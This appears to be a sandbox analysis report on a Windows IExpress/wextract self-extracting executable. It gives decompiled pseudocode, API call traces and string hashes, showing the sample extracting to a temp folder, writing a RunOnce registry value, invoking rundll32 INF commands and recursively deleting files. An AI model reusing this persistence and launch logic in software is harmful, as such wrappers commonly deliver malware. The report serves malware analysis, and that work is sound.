                                                                      											_t155 = "DefaultInstall";
                                                                      										}
                                                                      										_push( &_v268);
                                                                      										_push(_t155);
                                                                      										E00F8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                      									} else {
                                                                      										 *0xf89a34 =  *0xf89a34 | 0x00000004;
                                                                      										if( *_t155 == 0) {
                                                                      											_t155 = "DefaultInstall";
                                                                      										}
                                                                      										E00F81680(_t108, 0x104, _t155);
                                                                      										_t140 = 0x200;
                                                                      										E00F81680(_t156, 0x200,  &_v268);
                                                                      									}
                                                                      									L53:
                                                                      									_t62 = 1;
                                                                      									 *_v1564 = _t156;
                                                                      									L54:
                                                                      									_pop(_t152);
                                                                      									return E00F86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}


                                                                      APIs
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81BE7
                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81BFE
                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81C57
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00F81C88
                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00F81140,00000000,00000008,?), ref: 00F81CB8
                                                                      • GetShortPathNameA.KERNEL32 ref: 00F81D1B
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                      • API String ID: 383838535-2145762761
                                                                      • Opcode ID: b4df5650c66f4f732930e2488c914acf66414070d98e684b096a5600e56da6d3
                                                                      • Instruction ID: 66f4a994bea8bdc0173ff2bc56a85e3c9b5e05fac5a9d721caae0b54b5a0c35c
                                                                      • Opcode Fuzzy Hash: b4df5650c66f4f732930e2488c914acf66414070d98e684b096a5600e56da6d3
                                                                      • Instruction Fuzzy Hash: EAA13871E002185BEB20BB24CC49BFA776DFB81320F144795E555A32D1EBB49E87EB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      C-Code - Quality: 82%
                                                                      			E00F82F1D(void* __ecx, int __edx) {
                                                                      				signed int _v8;
                                                                      				char _v272;
                                                                      				_Unknown_base(*)()* _v276;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t9;
                                                                      				void* _t11;
                                                                      				struct HWND__* _t12;
                                                                      				void* _t14;
                                                                      				int _t21;
                                                                      				signed int _t22;
                                                                      				signed int _t25;
                                                                      				intOrPtr* _t26;
                                                                      				signed int _t27;
                                                                      				void* _t30;
                                                                      				_Unknown_base(*)()* _t31;
                                                                      				void* _t34;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				intOrPtr _t41;
                                                                      				intOrPtr* _t44;
                                                                      				signed int _t46;
                                                                      				int _t47;
                                                                      				void* _t58;
                                                                      				void* _t59;
                                                                      
                                                                      				_t43 = __edx;
                                                                      				_t9 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t9 ^ _t46;
                                                                      				if( *0xf88a38 != 0) {
                                                                      					L5:
                                                                      					_t11 = E00F85164(_t52);
                                                                      					_t53 = _t11;
                                                                      					if(_t11 == 0) {
                                                                      						L16:
                                                                      						_t12 = 0;
                                                                      						L17:
                                                                      						return E00F86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                      					}
                                                                      					_t14 = E00F855A0(_t53); // executed
                                                                      					if(_t14 == 0) {
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t45 = 0x105;
                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                      						_t43 = 0x105;
                                                                      						_t40 =  &_v272;
                                                                      						E00F8658A( &_v272, 0x105, "advapi32.dll");
                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                      						_t44 = 0;
                                                                      						if(_t36 != 0) {
                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                      							_v276 = _t31;
                                                                      							if(_t31 != 0) {
                                                                      								_t45 = _t47;
                                                                      								_t40 = _t31;
                                                                      								 *0xf8a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                      								_v276();
                                                                      								if(_t47 != _t47) {
                                                                      									_t40 = 4;
                                                                      									asm("int 0x29");
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						FreeLibrary(_t36);
                                                                      						_t58 =  *0xf88a24 - _t44; // 0x0
                                                                      						if(_t58 != 0) {
                                                                      							L14:
                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                      							if(_t21 != 0) {
                                                                      								__eflags =  *0xf88a2c - _t44; // 0x0
                                                                      								if(__eflags != 0) {
                                                                      									L20:
                                                                      									__eflags =  *0xf88d48 & 0x000000c0;
                                                                      									if(( *0xf88d48 & 0x000000c0) == 0) {
                                                                      										_t41 =  *0xf89a40; // 0x3, executed
                                                                      										_t26 = E00F8256D(_t41); // executed
                                                                      										_t44 = _t26;
                                                                      									}
                                                                      									_t22 =  *0xf88a24; // 0x0
                                                                      									 *0xf89a44 = _t44;
                                                                      									__eflags = _t22;
                                                                      									if(_t22 != 0) {
                                                                      										L26:
                                                                      										__eflags =  *0xf88a38;
                                                                      										if( *0xf88a38 == 0) {
                                                                      											__eflags = _t22;
                                                                      											if(__eflags == 0) {
                                                                      												E00F84169(__eflags);
                                                                      											}
                                                                      										}
                                                                      										_t12 = 1;
                                                                      										goto L17;
                                                                      									} else {
                                                                      										__eflags =  *0xf89a30 - _t22; // 0x0
                                                                      										if(__eflags != 0) {
                                                                      											goto L26;
                                                                      										}
                                                                      										_t25 = E00F83BA2(); // executed
                                                                      										__eflags = _t25;
                                                                      										if(_t25 == 0) {
                                                                      											goto L16;
                                                                      										}
                                                                      										_t22 =  *0xf88a24; // 0x0
                                                                      										goto L26;
                                                                      									}
                                                                      								}
                                                                      								_t27 = E00F83B26(_t40, _t44);
                                                                      								__eflags = _t27;
                                                                      								if(_t27 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      								goto L20;
                                                                      							}
                                                                      							_t43 = 0x4bc;
                                                                      							E00F844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                      							 *0xf89124 = E00F86285();
                                                                      							goto L16;
                                                                      						}
                                                                      						_t59 =  *0xf89a30 - _t44; // 0x0
                                                                      						if(_t59 != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						_t30 = E00F8621E(); // executed
                                                                      						if(_t30 == 0) {
                                                                      							goto L16;
                                                                      						}
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      				_t49 =  *0xf88a24;
                                                                      				if( *0xf88a24 != 0) {
                                                                      					L4:
                                                                      					_t34 = E00F83A3F(_t51);
                                                                      					_t52 = _t34;
                                                                      					if(_t34 == 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					goto L5;
                                                                      				}
                                                                      				if(E00F851E5(_t49) == 0) {
                                                                      					goto L16;
                                                                      				}
                                                                      				_t51 =  *0xf88a38;
                                                                      				if( *0xf88a38 != 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				goto L4;
                                                                      			}





























                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F82F93
                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00F82FB2
                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00F82FC6
                                                                      • DecryptFileA.ADVAPI32 ref: 00F82FE6
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00F82FF8
                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F8301C
                                                                        • Part of subcall function 00F851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F4D,?,00000002,00000000), ref: 00F85201
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                      • API String ID: 2126469477-4070797333
                                                                      • Opcode ID: bcbccdad3ed7132603c9194ae5d319402f439655927c5c6351db533c50700f03
                                                                      • Instruction ID: f20763a2e5a02874e9fa1203687ee84706cf32ad9a8377525767a4db6e61fc56
                                                                      • Opcode Fuzzy Hash: bcbccdad3ed7132603c9194ae5d319402f439655927c5c6351db533c50700f03
                                                                      • Instruction Fuzzy Hash: 0341AB31E006095BDB34BB719C496FA33A8EB44F69F040566E941C21A1EF7CDE81FB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 86%
                                                                      			E00F82390(CHAR* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				char _v284;
                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t21;
                                                                      				int _t36;
                                                                      				void* _t46;
                                                                      				void* _t62;
                                                                      				void* _t63;
                                                                      				CHAR* _t65;
                                                                      				void* _t66;
                                                                      				signed int _t67;
                                                                      				signed int _t69;
                                                                      
                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                      				_t21 =  *0xf88004; // 0x644c7055
                                                                      				_t22 = _t21 ^ _t69;
                                                                      				_v8 = _t21 ^ _t69;
                                                                      				_t65 = __ecx;
                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                      					L10:
                                                                      					_pop(_t62);
                                                                      					_pop(_t66);
                                                                      					_pop(_t46);
                                                                      					return E00F86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                      				} else {
                                                                      					E00F81680( &_v276, 0x104, __ecx);
                                                                      					_t58 = 0x104;
                                                                      					E00F816B3( &_v280, 0x104, "*");
                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                      					_t63 = _t22;
                                                                      					if(_t63 == 0xffffffff) {
                                                                      						goto L10;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      					do {
                                                                      						L3:
                                                                      						_t58 = 0x104;
                                                                      						E00F81680( &_v276, 0x104, _t65);
                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                      							_t58 = 0x104;
                                                                      							E00F816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                      							DeleteFileA( &_v280);
                                                                      						} else {
                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                      								E00F816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                      								_t58 = 0x104;
                                                                      								E00F8658A( &_v280, 0x104, 0xf81140);
                                                                      								E00F82390( &_v284);
                                                                      							}
                                                                      						}
                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                      					} while (_t36 != 0);
                                                                      					FindClose(_t63); // executed
                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                      					goto L10;
                                                                      				}
                                                                      			}






















                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(?,00F88A3A,00F811F4,00F88A3A,00000000,?,?), ref: 00F823F6
                                                                      • lstrcmpA.KERNEL32(?,00F811F8), ref: 00F82427
                                                                      • lstrcmpA.KERNEL32(?,00F811FC), ref: 00F8243B
                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00F82495
                                                                      • DeleteFileA.KERNEL32(?), ref: 00F824A3
                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00F824AF
                                                                      • FindClose.KERNELBASE(00000000), ref: 00F824BE
                                                                      • RemoveDirectoryA.KERNELBASE(00F88A3A), ref: 00F824C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                      • String ID:
                                                                      • API String ID: 836429354-0
                                                                      • Opcode ID: c979d330c0667f11ab6b97c9f76434d2536325f44af3740a3f5e5eec8b0b8bdb
                                                                      • Instruction ID: a9554f6427ecacb57b66aa92150df3aed3f9a059f18b6fa2a678f031dde96c8e
                                                                      • Opcode Fuzzy Hash: c979d330c0667f11ab6b97c9f76434d2536325f44af3740a3f5e5eec8b0b8bdb
                                                                      • Instruction Fuzzy Hash: 5C31A4326046449BD320FB64CC8DAFB73ACFBC4315F044A2EB59586191EB38A90DE762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E00F82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				long _t4;
                                                                      				void* _t6;
                                                                      				intOrPtr _t7;
                                                                      				void* _t9;
                                                                      				struct HINSTANCE__* _t12;
                                                                      				intOrPtr* _t17;
                                                                      				signed char _t19;
                                                                      				intOrPtr* _t21;
                                                                      				void* _t22;
                                                                      				void* _t24;
                                                                      				intOrPtr _t32;
                                                                      
                                                                      				_t4 = GetVersion();
                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                      					if(_t12 != 0) {
                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                      						if(_t21 != 0) {
                                                                      							_t17 = _t21;
                                                                      							 *0xf8a288(0, 1, 0, 0);
                                                                      							 *_t21();
                                                                      							_t29 = _t24 - _t24;
                                                                      							if(_t24 != _t24) {
                                                                      								_t17 = 4;
                                                                      								asm("int 0x29");
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t20 = _a12;
                                                                      				_t18 = _a4;
                                                                      				 *0xf89124 = 0;
                                                                      				if(E00F82CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                      					_t9 = E00F82F1D(_t18, _t20); // executed
                                                                      					_t22 = _t9; // executed
                                                                      					E00F852B6(0, _t18, _t21, _t22); // executed
                                                                      					if(_t22 != 0) {
                                                                      						_t32 =  *0xf88a3a; // 0x0
                                                                      						if(_t32 == 0) {
                                                                      							_t19 =  *0xf89a2c; // 0x0
                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                      								E00F81F90(_t19, _t21, _t22);
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t6 =  *0xf88588; // 0x0
                                                                      				if(_t6 != 0) {
                                                                      					CloseHandle(_t6);
                                                                      				}
                                                                      				_t7 =  *0xf89124; // 0x0
                                                                      				return _t7;
                                                                      			}

                                                                      APIs
                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C03
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C18
                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00F82C28
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                      • API String ID: 62482547-3460614246
                                                                      • Opcode ID: f107ff75c3fb92ed1015a97dd0e6639845a99575e0eff3b8fdd9f94bdbfc6152
                                                                      • Instruction ID: 52c38db67b8fd60d8f09db365db038afa0e25b4986ac1d98230e9f705d5bcd45
                                                                      • Opcode Fuzzy Hash: f107ff75c3fb92ed1015a97dd0e6639845a99575e0eff3b8fdd9f94bdbfc6152
                                                                      • Instruction Fuzzy Hash: BF11C271B00209ABD7607BB4AD89AFF3799EB857B0B480116F901D3290DA34EC02B761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F86F40() {
                                                                      
                                                                      				SetUnhandledExceptionFilter(E00F86EF0); // executed
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00F86F45
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: dae1ced55becba8e13b6ee622af3e3aa7709d32da19aaf2b61572c28105cdcd1
                                                                      • Instruction ID: d06b3b73c0c6c0847991cea048146f7397a18d211874e00cbc045d104fde6eee
                                                                      • Opcode Fuzzy Hash: dae1ced55becba8e13b6ee622af3e3aa7709d32da19aaf2b61572c28105cdcd1
                                                                      • Instruction Fuzzy Hash: B390027425150447A6102B70DD1D4A576919B4D602F8154A1A111C4499DB6080407B17
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 93%
                                                                      			E00F8202A(struct HINSTANCE__* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v528;
                                                                      				void* _v532;
                                                                      				int _v536;
                                                                      				int _v540;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t28;
                                                                      				long _t36;
                                                                      				long _t41;
                                                                      				struct HINSTANCE__* _t46;
                                                                      				intOrPtr _t49;
                                                                      				intOrPtr _t50;
                                                                      				CHAR* _t54;
                                                                      				void _t56;
                                                                      				signed int _t66;
                                                                      				intOrPtr* _t72;
                                                                      				void* _t73;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				intOrPtr* _t81;
                                                                      				void* _t86;
                                                                      				void* _t87;
                                                                      				void* _t90;
                                                                      				_Unknown_base(*)()* _t91;
                                                                      				signed int _t93;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      
                                                                      				_t79 = __edx;
                                                                      				_t28 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t28 ^ _t93;
                                                                      				_t84 = 0x104;
                                                                      				memset( &_v268, 0, 0x104);
                                                                      				memset( &_v528, 0, 0x104);
                                                                      				_t95 = _t94 + 0x18;
                                                                      				_t66 = 0;
                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                      				if(_t36 != 0) {
                                                                      					L24:
                                                                      					return E00F86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                      				}
                                                                      				_push(_t86);
                                                                      				_t87 = 0;
                                                                      				while(1) {
                                                                      					E00F8171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                      					_t95 = _t95 + 0x10;
                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                      					if(_t41 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t87 = _t87 + 1;
                                                                      					if(_t87 < 0xc8) {
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				if(_t87 != 0xc8) {
                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                      					_t79 = _t84;
                                                                      					E00F8658A( &_v528, _t84, "advpack.dll");
                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                      					_t84 = _t46;
                                                                      					if(_t84 == 0) {
                                                                      						L10:
                                                                      						if(GetModuleFileNameA( *0xf89a3c,  &_v268, 0x104) == 0) {
                                                                      							L17:
                                                                      							_t36 = RegCloseKey(_v532);
                                                                      							L23:
                                                                      							_pop(_t86);
                                                                      							goto L24;
                                                                      						}
                                                                      						L11:
                                                                      						_t72 =  &_v268;
                                                                      						_t80 = _t72 + 1;
                                                                      						do {
                                                                      							_t49 =  *_t72;
                                                                      							_t72 = _t72 + 1;
                                                                      						} while (_t49 != 0);
                                                                      						_t73 = _t72 - _t80;
                                                                      						_t81 = 0xf891e4;
                                                                      						do {
                                                                      							_t50 =  *_t81;
                                                                      							_t81 = _t81 + 1;
                                                                      						} while (_t50 != 0);
                                                                      						_t84 = _t73 + 0x50 + _t81 - 0xf891e5;
                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xf891e5);
                                                                      						if(_t90 != 0) {
                                                                      							 *0xf88580 = _t66 ^ 0x00000001;
                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                      							if(_t66 == 0) {
                                                                      								_t54 = "%s /D:%s";
                                                                      							}
                                                                      							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      							E00F8171E(_t90, _t84, _t54,  &_v268);
                                                                      							_t75 = _t90;
                                                                      							_t23 = _t75 + 1; // 0x1
                                                                      							_t79 = _t23;
                                                                      							do {
                                                                      								_t56 =  *_t75;
                                                                      								_t75 = _t75 + 1;
                                                                      							} while (_t56 != 0);
                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                      							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                      							RegCloseKey(_v532); // executed
                                                                      							_t36 = LocalFree(_t90);
                                                                      							goto L23;
                                                                      						}
                                                                      						_t79 = 0x4b5;
                                                                      						E00F844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                      						goto L17;
                                                                      					}
                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                      					FreeLibrary(_t84); // executed
                                                                      					if(_t91 == 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                      						E00F8658A( &_v268, 0x104, 0xf81140);
                                                                      					}
                                                                      					goto L11;
                                                                      				}
                                                                      				_t36 = RegCloseKey(_v532);
                                                                      				 *0xf88530 = _t66;
                                                                      				goto L23;
                                                                      			}
                                                                      0x00f821a6
                                                                      0x00f821a8
                                                                      0x00f821b0
                                                                      0x00f821b0
                                                                      0x00f821b2
                                                                      0x00f821b3
                                                                      0x00f821bc
                                                                      0x00f821c7
                                                                      0x00f821cb
                                                                      0x00f821f1
                                                                      0x00f821f6
                                                                      0x00f821fd
                                                                      0x00f821ff
                                                                      0x00f821ff
                                                                      0x00f82204
                                                                      0x00f82213
                                                                      0x00f82218
                                                                      0x00f8221d
                                                                      0x00f8221d
                                                                      0x00f82220
                                                                      0x00f82220
                                                                      0x00f82222
                                                                      0x00f82223
                                                                      0x00f82229
                                                                      0x00f8223d
                                                                      0x00f82249
                                                                      0x00f82250
                                                                      0x00000000
                                                                      0x00f82250
                                                                      0x00f821d2
                                                                      0x00f821d9
                                                                      0x00000000
                                                                      0x00f821d9
                                                                      0x00f8213a
                                                                      0x00f82141
                                                                      0x00f82144
                                                                      0x00f8214c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82163
                                                                      0x00f82172
                                                                      0x00f82172
                                                                      0x00000000
                                                                      0x00f82163
                                                                      0x00f820ea
                                                                      0x00f820f0
                                                                      0x00000000

                                                                      APIs
                                                                      • memset.MSVCRT ref: 00F82050
                                                                      • memset.MSVCRT ref: 00F8205F
                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00F8208C
                                                                        • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F820C9
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F820EA
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F82103
                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82122
                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00F82134
                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82144
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F8215B
                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F8218C
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F821C1
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F821E4
                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00F8223D
                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82249
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82250
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
